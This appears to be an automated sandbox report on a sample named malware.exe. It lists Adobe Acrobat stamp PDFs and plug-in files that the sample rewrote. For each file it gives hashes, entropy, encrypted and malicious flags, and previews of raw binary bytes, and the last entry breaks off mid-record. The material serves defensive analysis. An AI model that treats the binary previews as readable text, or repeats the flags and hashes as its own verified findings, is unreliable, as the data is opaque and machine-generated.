                        SHA1:498652C1A4093209055582DB4E696F514867AA6C
                        SHA-256:D1042ADBBB3088C96528B77206B972B6A19FE77995995E156D87EBA4C822F800
                        SHA-512:F88E26139935E1D819C90D79561C2E46199F76C89BB36BEB1FBFDB7C23B2BAE153FA76070F8051408D8B018361D6EB5EECD87ADC65F5C857945FCCE04AD991D1
                        Malicious:true
                        Preview:.uG....2.o.4.Nq.)......wT...t.......lr.$.\.1,.T.E.M,.mKN..L.g.1.F+..>s.m.ML.7.A`........M.*....(.uG....e..X.P.......}..x...'$.6o.o.p..W.....w.by...@m........#.Q.2">......... .X#5O.e..hj../m.9.P.....=x..~.u.^.Xw.!.;3~.G.....N:2.`.f.Q@..........h*._.....kPK...R)N.\...........F.....).AU";fo.......(..2..t.P^.^.,cc...U.1#n....l.1.|..gF\.!..`......T]..2.a..z.j;..*..P!5....F<.'d..HwR........h...=.A...@Y,....n.1.n....gul.\i..@....@..E.u.#..5uM...yYZV<H.V.Sw....aq...SH/?V..FB...6(.q....JA..8.4.9.........K.@.......8..?5...2...u.9.Q]..+..-...+w. Z.......l+...._%.@.`.>t.......d..B..\.d....Dx...['e@\...1....b..m.....X.....). ......8k..e.d..tU..dT.{.'MY$.0w...ti..b.....k/.......']"..=0..9B45I..;.S...gM`...v.,..]...MG.c+|0.x....U.:.4.4.T{G.&.N...;.n.;...;..~..(.c.;..P(.....Oq....|ir...N.h2./.|.!.../T!....'s.}..'J..q......1B.Z3..Bt.'s.Vp.h.k}./.2.t:....X1.}.x..S_.....<J...L.....g!Z..2.Q...l.....l..G.c......E...e.#...h.S......)...Z...X...kVj..d.[..a..].....

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\SignHere.pdf

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):40834
                        Entropy (8bit):7.995047296628887
                        Encrypted:true
                        SSDEEP:768:2n8iwaou4DIBrsBaXy0OauT3TuKH7lWFFIsrFuXGvBv1aPHF1:+8iwaounBrnC02T3nblW79Zu2vp8HD
                        MD5:C04A6F8492EE585E45366B20769EE416
                        SHA1:DD96113E6D4536556985E28BAC3134EE6302C971
                        SHA-256:3F1533047B4B4C27F1922E9BD1406D735F32565F8D07D1B324299A2A8E7676AD
                        SHA-512:93D1D68FDB3EC80B3C036767EE28FAA304AC389481A50481C5B3AB989F6B3A75AF1867408E3C2DCA61C0588573B4AEA8E1C907FA2015C1CBF74556746504BD14
                        Malicious:true
                        Preview:p....s..:..%..8g.o.".7Qfu...|......H...#...pv.g..3....n...;.cl.>....C.tRU.....E....1So.|8..8...6..SU.A.s.(..-8..q.=...........ki...I.:.Pj...&......l8=P;..`uYi...h.....:.....hO...:>;.}l..ud\.%y.f.i!"O......;f.~_...h....._.Zo..@..*...q8a.$.4z\..1:p..,.....H....O...'Q+.Z=.S^..s~(.....PU4.|..g...R{N>=ci.F...m...j.scg.#.&.Q..+.BK.X.o.....n. .....-4..93`.....O#_*...$z.".g.`E.g....lVG. D.s...v>L.k.'X.*$E6.a...NR.....\..L.........%...&...I..p..f...0.v.j9q.|.*....6.A1.M!?.....Z..spf.'.(V.>T.._......|.......0..4..vm...'...!.J*..s.Zr$}y.H.h.6>.b.[G...(g..>:P,.....5.q@J...H..{,..?C!+F.O ..8D./.......<s8 ..=l..ax.....:.I.{\+..x5....".[. .'....Y.@..!hx.M...[%....Q..?;....y....qX.e......./.i.#E....A....!..7..v|*...W..T..gHHm...22UH...@....r5.1..R..O.p.........B..........K.....I..#.i`-."./`./."..|.'.O. ."\.......>..wr..rq=...%........X...$..r.7.`..o9..g.*.N...{.j..%.... ]....@.a#.K.......=..%#"....2.#...H..=j.E..sP.\..X.\m.C....~...Py*.\t./..%{r|...

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\Standard.pdf

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):116065
                        Entropy (8bit):7.998146571530214
                        Encrypted:true
                        SSDEEP:3072:g/Qy/LaLA0BbRTzwfj+SSFdHomxcd4Oao+9OxcgO+bbkc:+QyjabBbRvwyKlVdkc
                        MD5:C3E84867B030C3D8B223434FA52B9360
                        SHA1:436072C5BC07A7C9652F288318CA772DDD5E2EC1
                        SHA-256:49127ED5272985F36004FE6A037A8E6146A068D74DF0C2AC1A144E125A702667
                        SHA-512:C9C86260ACB97EA5C598B097289E34EA70EDE98EB0222866C2821F3B3E2D9E5B92091A763F13C9146941ECD8D14898D59EB3FADC295ED4888F2807D4A571509C
                        Malicious:true
                        Preview:..<P."..<;..y.....Z....r....Y..q......f0.%5....e.U.#.!.... (U...S.M.o...... ..........n.vb....U)l.r.c..3T7e.....j3..RA.m........._[.~..-...%4..y.;....^......R..Jw.Z..0+.../2.......+-..q...W.7~F.p.l8...k..x.s...0~.kn..}....}...#.fo..}...-.@.V3...K[..e.Q..u...@. ...F..^.+.=...{..m...Y...%sV..............r.<$...u%nM.A.zekp=9..2..ln\..-I.Z....r4s.9$.9..L=.}.../.J........,q.}V..\!^....?4....s1.!J._R.b......),.K...."a..y..1....g..X....R.K;8.....:_dhG.4...;c...(....<....cC.9e.dzM6r.b.7.HD.....S.(...q..U..J...../.-.+e&..X..AAT......."..B{P4bB...*..$.H.i.l+"x7...+.....&.Lu..H.A.....63..X!..p.G...[AKj4...g..b...T...J..y1U.J).i1G.th^..X..c....Ee:..0E&..D+}..Z..OB;.....DA.v..^..v...D.`r8..T..u.O$.D.1.W......F....S...Ys.j.[|.V..DD..!.5.v..a.1...L...2t..5..Fu..1C......Z.wJ..|aD....P..0R.d..H.F]9l....7c.xx...k.H.#..{~...vk4.(...q..K..1....B.!(@a_$7..>...k.Z.}.H.........M=....PFP.(.5...o/.E.b.u.r_.@.W..f8.8/.8.....Z..d.^7......D./m.K:.......*&...2.U#q..*...yP^v.kL

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:OpenPGP Public Key
                        Category:dropped
                        Size (bytes):108871
                        Entropy (8bit):7.997139728509727
                        Encrypted:true
                        SSDEEP:3072:D8xD1m1tjV0c6Hxwi1lfxPKQsjVfno8IBj:wQV0c6Hxv1HPKPjVgxBj
                        MD5:D7AE7CA16BEB6F9EB70E5380512B712A
                        SHA1:75B6DB59F7C76701D923F0F0417BEF5BAAA1B6B4
                        SHA-256:63250644E08393F1ADA657F6B5B2A0F49604D5513E5D113A45F4AF72C4BA5442
                        SHA-512:AA0BA19C2E11ACC1B7CE5C66F4CDB25E2780A1C7AAC0E74EF7258FCB665DF81499784D84DA27627AF707ED0C02C2AAB1D9008EB06D0216FC920B601C1E162E5B
                        Malicious:true
                        Preview:...d..._..T..=.O=U0.A..}.Y.o.9"O....h.....o;..P..:.g.'....Z...W.........8...%.E...5.....6=....=F...\..$.T..AMY...{O_81M.CL..T...B."U...*.. ..,.8.&.....H.Q4......'..-.|w/[;q~....5..T....1.....9........@6Se...........v;....L[....G..B.?..6.7......L.).......+`.n......c.d.{..YI.2.........h......k#l.Ds.}...o....c...2w.......[...6.~Td..............B.....{e.OgI.^..1.X.i...R\.tm.m>Fj....T.J.F..z.0.......P!......<..6al.3P 4E:i..1p.8..f..^..~o....?.d.w.Xm......e........!.qS..5..(.tT.<=..2q.....l...9" .....]vk.8).9.[-.{.d./.../....{,!N.....`h+.CcU........;..<*.!L..wz.;&.?fgh..c.=...]'95.....&.J.trc.V1.....{.5j.B;$.....[....F+|..g..C'.S..|.d}....d.@_.......P....s.3.........I.e...\...}k.'.*....d.x..W.7..e.....t.....]..(=Q"..)Ocum..a..}.e.....'..uDEm.uIE......ku.......m...a.&.~.q..d...uJ...E......d].3I+r].[C"[T..o~.1......=+..NQ`..<..:.d.r.(.J....h.".../SKSd>..7<..@d...K.(.......6..OR..}......b./..,..?....g.........v}..)......v.o.8..y...'.o..

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annotations\Stamps\Words.pdf

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):112606
                        Entropy (8bit):7.998459707358694
                        Encrypted:true
                        SSDEEP:3072:DKXR4vYH3J8XxoMcgyUXHXfq6bo65fxutIU/j:eXR4kuQgFHJpTutjj
                        MD5:6DA5957B7A5AD7598A8A39AD105434E5
                        SHA1:5A8D2EAB6A106081B62CA657F1E285BFCCBDB1E2
                        SHA-256:4813F79228BB6E8E5E3C3E6D12C07934B6A11E109825068108580B831EAF0AE4
                        SHA-512:E3D4A4EDA880DA7EF4B8A39F8030C643EE85912FEB678B56CF2680366A48818205CF119BA085165F9B9D517EE57A73EB6A36C15305A7FE0E0B58BEFD1986D1A7
                        Malicious:true
                        Preview:.[.T.+...(..A....B@..MG....T.........m<.%-......(...s.XR.7W.0....L.!....eYxK.HY....*.+7[.d=v;9...~.........(..)g.i%B.i.C.-*.Z.#L....?..O.....1.&..8.L.q.6..;.]...g3FHf.../..[J}cHgZ...U..b-..{...0.....e."b.:x.$.Tx1n..}$./..(...j..Jm.:V.CWi......@.76.*D.1/.....'WRK..).\....M..,EXs.......[GC.....R...0...t...!..j......y...z5...V.. ..^....T..>Y{n%...b'.*&X.}p.."..+u.m/.r.E.&w......;@...:......5..`o....F.x...1...~.YMO........t..hJ:&.y.*..!s..#....p<\..a;.,....sT I....GHl..3.(....T.m\..#...3.../.,v2$).,........g..`OTm:..G..1..|.....FX..F....=..M...0.P....+#s...=-Z.e.Q....d...p=.<N.....WF..p.2Kb.a.......J.0.7...... V.nCW..}v.,k..I.B.`..Z...1..a..t.X..Y.;w..y..i......G.>.n.3`.,...K............p......'H[..#-8..Z..."...D.l<m=..1K..T1......i.p.BEMy......x]...d^.1!n..W.s..X.x&.....8...R1.....|.-...j..b.LO^.....bnzBTW._T..I..."])td._.c......6KG...,..\.....L\.D<. ..q.6.8g....NZ....$,`.a..f..N..{C...A.....lSyZBO0....6.._.C...G.,..../.../.....Q..FM

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Annots.api

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):10837060
                        Entropy (8bit):7.4466621000572895
                        Encrypted:false
                        SSDEEP:196608:fFo6kRjn6t4/U4MHotdXB0CueIKQuvafe7MLdmY8:fFoVj6m/U4MHoDx0dJuvHY8
                        MD5:16487FD2ABBBB16DD9B65C5FC93620A6
                        SHA1:E726A24D8874102DC04A588C7CD2C0373DAD961D
                        SHA-256:79471CE37CB5254C0CB71EF74EA7B3DA942C0B0CEADFD7B4130758B83B4A006A
                        SHA-512:F84CC0B035DB71B5779552621464DE94618D440702BC1F8AA3DD07907696E5AD5DFD6A4694E733E36BE0C390D6436169EA3A592EC7B2067CBD1219FF4D27C08E
                        Malicious:false
                        Preview:.....A~..2...S..Y#...G2..!..E.q...hS.>}..m..an."`]@]D.dQ!.C.n..(..j{.D...U...*..g..>x|.....h.b.OX.QW5....+3...=...W...k..L........(.P.B.6T...c..........*......dA..nGj\.\..h+/.C.......)t..R......E..^tT$.|H..!......U..uI...\.b.-..d.."...>.{..PZh..l !...Ww.:P8......q.p...ODJ..........g.B........H.}.8....~.hU#.H..:.T8.....v...W4.0...H.o...d.[.T.LX...KBN.....bs..DV0.G...O6....N...5...DVB.S.QS..>.q..Ps(.dh.V.G.z8...6/..-..>....v(.w.m1./...R..........]_l.%...t+]..hg.Z.}z.l4...P.w.;.v....e.:..y$_D...z.P.@.)Y.....b2B..................~q.uS^^d?1.u..q..{.%>VW.M..9=.....].d...y.fvJ.q^...........d..$..d......b..N...r.......0.D2....a.-.?w....G..=f.(O.d=..3]......'...N7)T.......q."....4i.}~1./\.d(.....i..r...9..b......3r3..Vy.j9.WN.[?....M.t.$.K:....P..{...}...:sDA...h_L........^q...o.-......*)MU..:.D.]..j>.OrG.......+9GYk..9/.'{...w....^..o......".h...HZx.O....W..F.~.9f.O.....^...{._.%......[.AA..pf.+...z1(....y.....P1._..g...N.x...L.....V.NK....m.3.n..I;

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Checkers.api

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1090116
                        Entropy (8bit):6.3432426551112115
                        Encrypted:false
                        SSDEEP:12288:6BVAwqzErTXx3TMc6G0BM3t03Gt8QIvcaryviBqswT4r4EsH9:6YwiMXx3TqvB80WCQKchiPw0r4L
                        MD5:F73DA57C3A1B83386984ED4FD14D4B7A
                        SHA1:BC998DDC21A1D28F7011E8AC2E1CCBC10F8C186E
                        SHA-256:42244823DDB8270361CBE8AA31B611F4563889039250A4F2E44179E4BDDCDD81
                        SHA-512:B7DBA36D22ED1593D25A4027196E2CCF4782AC671C08B4C7A4DC2512CE409DE8C5D19B82A931C4FF317BEB337EE36BAFAD79C02CA304B9FEB853EF5E916B23F5
                        Malicious:false
                        Preview:.<.. s...?B...J8..R%....TV...9.}qQ......n.l.Ox...j".+._..#I.h.]....9.m...Ri41..c.g?....g?...)w~.&K?..lq.502i.].....Y..u]....Z......z.....UiA-.+....C....N..T.9..v.... ...."rt#..-....0...63.Mu...f.....S.....:..52.u.0X.....@...i...T[.MR/....#O..y...I.T...[....;:&..TJ.e.f.!..u......=..F+.iv...9o.lp..(...........w.CUz..U..,k.(.G..@|..@E......!.....jLm.IT..!...!6..\I/X~......w..z1....*P....C....D......p.#F...)...a..R......1-H.r%H.`..:....B.k.O..CG.wf..+d<.....y.'G.[.....<.....ZE.L6g..q.`R..f.e......].r.i...........".N..K.....o1 ..3./..P.M).(G..hZ.G.g4t}$.X.....-l+.CO.K...._w...z.t.....Z...N#..(..b1O.O....$EG..i..p..r..s5/......B.W.cv.........?w.~..&3f.....""6rh.+...(..=.ap.'.o......,*....?.Ze....!...1Hn..4.4...c.%.i...[2...a.....5r..z.wc..g............ES....>......yK....m...z..n.u.M.<(].&]Zvz.Q.}d....4....8Jcp...A.q.?..>Vi.9g.0T.......e.#.hQ...%..b.Fg}.D.x.;...n..Xl..:-.<...FQ..6.G....<...S...7......=m......}....;...9?.......'.F...&..;;....

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\DVA.api

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):165948
                        Entropy (8bit):7.995276020813293
                        Encrypted:true
                        SSDEEP:3072:O7OE9OlUhalWeu4M9it263S7qOgZqhdlA8hKrZCpMslM37Joh6bPakdP+M:OSEMlUhsDM0tXi7qPZKjhqCpRle7JXa4
                        MD5:AD5967C05A2C534B3FE5C6A6EF2560E6
                        SHA1:E9C6DBC2FC08C76DE585C99620E9ECAA4FF2BB5C
                        SHA-256:2639045821B660A8EC452C7408F8E077C5B993641157680F289C343969D38549
                        SHA-512:431E823ADF30AB164A8E09A0BF3EAABF0B421234BACA6AB5A974C17CDEC633A5C6951F4E6B4A6CD10F0C1294577E4829073FE7FE8435732BEA2130BBC2ECEDC0
                        Malicious:true
                        Preview:..?vx.....K?.D...Xw.<.&.....d!.)....H....J!..Md (9Y...'GT..\.s..yX.@N..4..w.Gs..F.....!tY.XDw..e|...r....`...6..Q=.I.6.4..O.....|..G3\....gi.Mv4.../.;...V....A.x.\!.v@.^.nR..x%`-A...p.........PP.yj}........fo.WuZ.....a!..M......>.....N..q0...@..._.z..^$=..!..mH\eR.N...Z!.F@.....h.]{Y,;.Ze....| .H}m.`d.4.Z.V..B....7.H..p...(...s..G....Q.*.....C.[=L......cr..#W.....(|.-.IHefBw......3.....g..&: [..).9..d..e_4.=1*.E..rF{.+ps..G.........z..bJ..E{{x.......m ..........]Y..O....<e..Q.{<p.x.@.j..5 X9....:y..y.av/.v..m......q.....:?..:Tv......y.f...U..F.k.ML..i.-h/3..&..\......v.9m|~(@k....=a.......?s.+.......r.ni7...m;@.....$..O...*...(...[.P^j^.vp.|.B&r.}.v..J....A..k.>.......X..............J.M.C.U.w..V.ah..!l....PJ."Rtz.a.Ci...d.....ap..v.dKF.VAJ-5.i>....a..?9....`.....6Z.N.....@V...X.4....x..%...L.S.TM`T.......W<....?!~..r.s..^.w.g..0y.O...@..0..:.g>....Fb..`....A..3..Q.....Z.JVr..>h.5).*...&cfx..`......!.B>...}.K.P(k...uD.....A..Z......Xa..._

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\DigSig.api

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1633860
                        Entropy (8bit):7.043348258065874
                        Encrypted:false
                        SSDEEP:24576:2Aa/sQZVM/cVhaBfwtJfj4Qeq5k89/zyI6NrSWAs8ocvjExV9T:jaEQI/cVwBfwtJfjh9/WI6NuWAf5Q
                        MD5:1B5C14BB0AA75BDE37876E9A8F3738A4
                        SHA1:9D94E9874A6AB5D2CC8B614EC3A44699C3187364
                        SHA-256:8FE69CAFB27C3E26503586F5B480FF6F9A785256EDED69B3749CB5FDA04EC723
                        SHA-512:1C68FE1A26BFFFE541A62AA3AB9CD06E8C65AA5E79D9D7D0F9C8C97881533CEB79F6191A49A2CD44119D56C21FDAB4787D5D19219D928EF9E6F18251AEC99E3C
                        Malicious:false
                        Preview:Ti....~$......;.4W.z.....DN.:...Q`xt.E=...PuO.y.....O.....+.+45N.M.S....L..-......h>3..{.W.i.V\..b.|V.'..y.....#..t.:.>@,....e...Ju...V..nLC!.,.`R.'......V?q.doQ.4r.<7>U.,...).,.(dK.?.g.cP.......;p(I..x..6...;.\(....E}..++.....[/.1.+..Q.......|.2....ss......q...pP.b...s..;.... ..J....a..UO.(.X..n......b.J8h-<...AI"..V...)....C.V..F4.$M...^IWZV.&Y..],$.*k`......N...OOC.u.'...A..S....=.gy...>.H.w...I......YJ...L..,t.=....a.....Cp.(.j..j...P...+2q6..f.a..6..D....=..@..^$..z.....7...n.k}.~..*........Q.`..U.C|.4{...9.(Q.P..1ibs..(4.&%...5....\Sn..y}@q.z.5..t\.;....D.9LtH....o.H..?0...]e.H...5<.1....)M..'|NG..:W*u..E..Y....Q..S.0...zU..?...0z}UH..{bI..3..zm.......D...]9(jG.(..q.4...>7...#@.@ ..Je..V.'...r...h.v.(....(.5.L^s...&....g6.M..`.9...S.B.^.S.<^"Y>...KC...J....>..'..l.DF..`..S+H..j..|B..j&.....!.N..H....t.-."..:...!...gA.&B....i.5i....F..6...W....v.>5C......y...5.Q...4.J..w,.'...JbZ..6_.|.#...p..:`.9..HZ.6Y..M;...G..7y....q..d..A.={

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\DropboxStorage.api

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):321092
                        Entropy (8bit):7.99761598614987
                        Encrypted:true
                        SSDEEP:6144:kjOJW+ohEl32Bvne0dBQuCAbtwsT3JNN4H3dTH75mbNVbYY/tOErYc:NohEl3N0dCuCvsT3JN29mbv8YYY
                        MD5:5FFFC6A026E3BE1F11974AFFBF662564
                        SHA1:4C5A20D87EAF364A7FFF5E6158AA6B8F67968885
                        SHA-256:ECE359BC4C8AC2171D2014474E5898FFF53D9DCA306E6FE38EE2AEAD43C3DBFB
                        SHA-512:A9BCA80C2544D868E71FC776D6C6B71F5A9CDD1854389E4C18BC371FBFA736A9460A3411D51165921A7FDE35B0C8BDAA7155E14BDDBCAD6F7A1104569A2868DE
                        Malicious:true
                        Preview:.0...ff...}..O...U......r;...>.......|_Dc7.'.N.....'.~...@....T..M..s..B..l....o.8S._VjgrV..10H.j...S.sz.EiO.....!0..!.N...Y.d.%d...n.s..[....\lI.9........0*D...(K..U.h.]....(..u/m.S...sh..p9.a.....6:;.....D.7..M(.!.....H.a ..n@..w.>\.r|.Mfb:zp.....3.1.dQ{#.....G.....^p.\...s,.F;L.jr$.tC.L.$.E?...c..#O.gMR.W{..=7...E..bX.i.`.>.H...#...}....r..By~i..o...El..n.v%@..,......2Q..*.er.kL..7d.zP..!S.......}E.*.0Vg.m.+.<.,...l.=bk./.2*.N..!...g...~..c...~...=.......r.v).....`.o.P.......A....Z....3x......7..6u..2A..)....c.Wu..0ge~}.y"....o..;.S......5x.~....w:$.....3......3.KL18*].c.1....pE...?U..._.+9..........I.........4...{..FV..A.K.7..y..g...9,..Lk...........AK..6..1.}.h.*U3.*=...uM.....V|..[Nso.+z..]*.....?...CZ".._@c....\....>.m.Q..&2u.jz...hsLZ..b.A.[./.......Z.yA....k2......Z...@.6.1..5...[.Q.....|{o........W..f`.....}...F...........I.0..c]8....F.........x......vU/......,..&d..%.JMA9.w'.Bx;^....F...JV...;..&Hk.....J..>nQ[........>..^..Y....

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\EScript.api

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):3889732
                        Entropy (8bit):6.895653289486892
                        Encrypted:false
                        SSDEEP:98304:JtdyyM1WuWIky6uO/zWYOyMujFp+hk9qCb:g2/X/zOyMujFp+hk9qCb
                        MD5:4D3E0EA7ED93825ADE128378E6D07730
                        SHA1:EF5F76ED20167DCBEF118B7E9DD83B876CFBF2D2
                        SHA-256:BBD48F242F0836378DD4D8CAF5798E4955E51AB3FE65BC9D592EE8828573EFB1
                        SHA-512:DD040659424B0CF246AC6F5DCCC716B860411B00C1CE6964ED8749FD670DB1455D8CE06FF218F1F7611C7DA5971D45DC37BB4764AFB4FA966DA93113D32915C2
                        Malicious:false
                        Preview:ba.......F}9...q..ln..../..tn`..{...../..\.<..dO;:k...ot.'s=...........-.B...L.....n..$.V2.A4,u[..]Z_Xj..........G..`x...~..)z..9....&...d.~...".|...........BN..~.2.v..o.2.r@.......88.?.0].d.J....X:.?..-(.z..e..fW........<.+~.l....PF....H....9.(.1..3. . ..!...Xv....e...[x.....+.(.lD.RB..'{..y....h/]..........c.)k....B<` .i... ...i+J....?-f....n...d.(4.j~.{../..m....:.x.?_..iT.:=..}.+.......a~.....?.-h`B..##.sM&..>I.....yk...T:w.h.r......8.%.s.up4...n..|.#m......+.P.NQ.}.!.@..S..:..z^.W./4%.V.>q.._.I..Tc..)*..Lyd.........Me_.xR#....DR............t.F.i...:.....R..wZ{.K.V.N..-M.\...@. ..s.oP1..^.7.f6....$.C"..xBt...Iz.w.5..I.....~"&..,|K.......p|+'t../....'...K....p.d.Be.J........=...VY*.s8...4.'u.nTq...8.y...........a..D....v......{..MO<@..{..B..J.|<...T^J3.x6..z...~.....!/K./.4...W[.S~#.0I.....I..`..xg..u..J{0>*./....r.cg[..-.....shFSZX^.e...<3.BCE<... d.K...@.d1....."%..(q.@.+..R..?o..d....G*.....IO..z.0.n<uI.(G.5......c....~ib6.7d

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\IA32.api

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):264772
                        Entropy (8bit):7.9975466990648485
                        Encrypted:true
                        SSDEEP:6144:m1dNhIP7SHIvcWjC+NshmBwZdY2XOWKSWa8nUN4HqdDhMjJy3UDdBoabc8:mFhuS5D+Ns866WKglNsqJhyyIM8
                        MD5:3908212738555943871AC40B82CA5D91
                        SHA1:E6D5ED84666B29BF0D9F6AAEEB8B9F3DAA046CFB
                        SHA-256:0896627DA73622449A6D23BD96330F5557C2C6040B3007DC3CF609BC8426E2CE
                        SHA-512:6BF20018C324D04E8CE628601DCF5D6EFA499C261CD6F8B7852A926CECE4C8EB955ABCA7A655C9876E3522C8FD2C0F51CEF9D7B5A6F1A0131F582847E8F4A969
                        Malicious:true
                        Preview:.9...jf......?.S"..o...k.mTw/.....vo.}.v.2....'....@=. c._50..V.-[.....uI4..[<...v.(.R..U.u.&..~q....X..!..H.6...,?B4.'`}W.q...M.+.._....F...@;.....rFl..[b........=.rj..a..@$...s..)<P.D.]3..dc$..i..?...5.. 4..NuB..:.W.....i.yG.n..:..k. .bVlvR.p5B.:f..d]_.~MO....U..9$.......T.L4<.=.g..5...=....QH...sU.B.s|..v~P.'Z|C...r{].H...z.b.........bon.<IO)pNY.L[5..x..\..5.l...l.R.x..o.Sn.."...2o...5G...FO....5...T....".........j..JQ.._&DN..p.[.f]...O.mo.m9.O@.@....u0h..B..#.i...I...:0D....r...)T.G....n.|...I.2.d...W.Tj..:..~..=).U.D....|..|.L..m...L..8..<...a.u..k*..o....W...c........:...R.<.U.....Y.`..(.(#..k.0..fd..Re... ..)v......x.b(...0K......B.L.x.[.9dO(.......S.....$..I.qV5......[.Y.?.X..n..>.kK.~....!......F..>..;...?..k..-}..6hz- 0...Zo.....'......Q...&{...M....6F...,..*..l[......&#.u.......D...y+...+3..AS.k`..O.X8y(6..:I7OV....L\...-$N.C.....5.5s..U.@&...hsp.8.... /x.....[. ...@M..yU....6.p..>F.1v.....b.e..C..[..o....1.7.....\..R.8.C....

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\MSRMS.api

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):973892
                        Entropy (8bit):7.99826788139745
                        Encrypted:true
                        SSDEEP:24576:H3ZYbCmoynjG4flGF6hwPbdmGl/YxtfhzgR54eBtf5/yNR7:H3ZSYgFflGFSwjdmG1YxtgthqN1
                        MD5:78821001230BA49EFD811B5716D23DFB
                        SHA1:668FD187137CE08A011ED24E345E56EDF29651FF
                        SHA-256:941BB84C4AE32E3290AA3292509F00E08AEC0E32BD65C3E572F4C8DD333C7E49
                        SHA-512:9BA26E29C45CD45EC84C9D6D156A26273AAB5265CE45700E484094FB56764D1ABB0A178BE73F191E49DF7F8CF8F30571758326456D6EBF263574978EDF62F84E
                        Malicious:true
                        Preview:.....vi.Rt..L........L..r...v..4.....,..0'E..........T%.*6.+..f..'...n..`t.A..... ..:s6.k.t.....)Szc%.D.a.....72..ie....W.........7..;.R..FWY...l..x.}.a1P..cT.N.x....[@T..lx.0.....k....k.@^.......K(=.2U]....[.m..Gfa..../..,.S#..Y..P\f.......5&..5....q..b04...".`O....5.E..)j...f...J.G.A.(9.5.s)=."...6.+._....X..[.k.....{.p..#...K...:.H....D..].......Z.9<.-...7I....8<.3.AW..S.._(*.R&.u.)......M(.FR.`|.)...u.q.W...Rc..X.\L...9#9...<.8<.P......8...p.S..`...sE:........xz8.x...3b...vHT........<O.h.z..RA..y.uV.%...>..o....3Y..>s..L%.k.......1...4Y..@J5*.>..T.cm...RdN....E.)P....w{.Bu..U..4.m..U.f..G.."..r.|....r..@..`..`T.M.^....=B....3.\..u...9 ..nO^.p.3D...!1.#...@..!F.5..'..>......1....G.@!.>M.3e...D....u&...J.....0 01.m9..j...].E..l.3.'......l...E'f.......B.._.....<..%..y....{u .....b.].4.......(..^B.Qyi.[.I.4.... k.eab.x....92)G.[....`~........]...............Q...O.....tg.t..$..,*.n|=OF.i._..,...~]1.....#.$.aY.Y..,M...|.my.sO..4u.|......n

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\MakeAccessible.api

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):6537796
                        Entropy (8bit):7.035401268684871
                        Encrypted:false
                        SSDEEP:98304:9h6P471QVVtZC7kLW4SltnF5vvLHSOAjNa:9VkVCoLW4Sltn3vLHSOABa
                        MD5:2F01AA4F3E3ABE8A177EBA75B42E8F34
                        SHA1:D9DA724E474232C2F6C95C8BEA4887B5A5EC4794
                        SHA-256:894F05FF7D2C53BB7034717F5D9BDFA449A136A81EBDFE8F63E2E93CC0108F97
                        SHA-512:BC5DB720C8D91E81B6B04B543E064C2C97644BABBFD098C7A1EE3A99F1A9ABE008CE910F7656337480449757A54734D3960B838D191AA2CAD51173F93D8E1C8D
                        Malicious:false
                        Preview:..9...U(O.w...%.bt.N../9-.9t%...X.a.....S.......^s.h........V..n..q&.....'.....?.1...,v.c.v.`....[...4..f....+]....W..3..ZC[......l.KQ%........N...Fl../?t......ne...\..E..../A.F..Y.....yx..<..s....F...E......D.h9.5.~l..\\3......8..\5_.`...$...}ZO..6X...R^..7;...0..<...j....s...q..*.A..0=..6.F5.(.z....Pp.&............wF.}5[...s*.t..H.tsGzS.2C.|...qc...aS.".D.+/.j..W..Hl....{..3/.1./&.I...d../...c.2.k<...{..(.`......*88..x..\.G..f8Ke:`51... ~..N.e..-...w#4-...1I7..[......fg..o&.r....g.d2xF.-.H{.......sW$.L....z.>.."!WW...A&. ...u...+:...K{d...a.n...;3$...U.v=....S.?..Q%E...t...T}L~...y..J5..e.t.l.!...BP.......y.c}.8......t.....m..u-g...3z.g.3[.E_ME&........#.......:&[$-+.*...|.S.1..H(...NR....f3[....P..Itb.]T`..m.5\....0....j.Q8...3u8,.|U].k..E.-..l:(...R..x.......e.........[..F|u.x...].Z.mCY..KM%...\.;.o..Kl'.z...j..f.}.}....wM..n.?s=*<.j..'+.m ...O:X.x|.M..LgG.."K`..-...fy..N..J..h..n....?9~.[Q.:2.....O..<......0..........VV..x...:._.B?z...

                        C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia.api

                        Download File
                        Process:C:\Users\user\Desktop\malware.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):1790020
                        Entropy (8bit):6.95807966562916
                        Encrypted:false
